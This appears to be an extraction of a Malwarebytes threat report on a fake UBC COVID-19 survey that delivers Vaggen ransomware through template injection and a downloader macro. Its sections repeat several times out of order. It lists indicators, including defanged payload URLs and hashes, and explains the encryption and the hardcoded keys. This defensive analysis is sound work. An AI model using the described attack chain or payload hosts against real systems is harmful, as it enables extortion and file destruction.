on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2325 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2326 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2327 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2328 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2329 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2330 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2331 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2332 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2333 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2334 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2335 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2336 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2337 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2338 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2339 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2340 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2341 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2342 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2343 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2344 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2345 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2346 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2347 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2348 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2349 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2350 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2351 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2352 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2353 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2354 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2355 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2356 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2357 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD 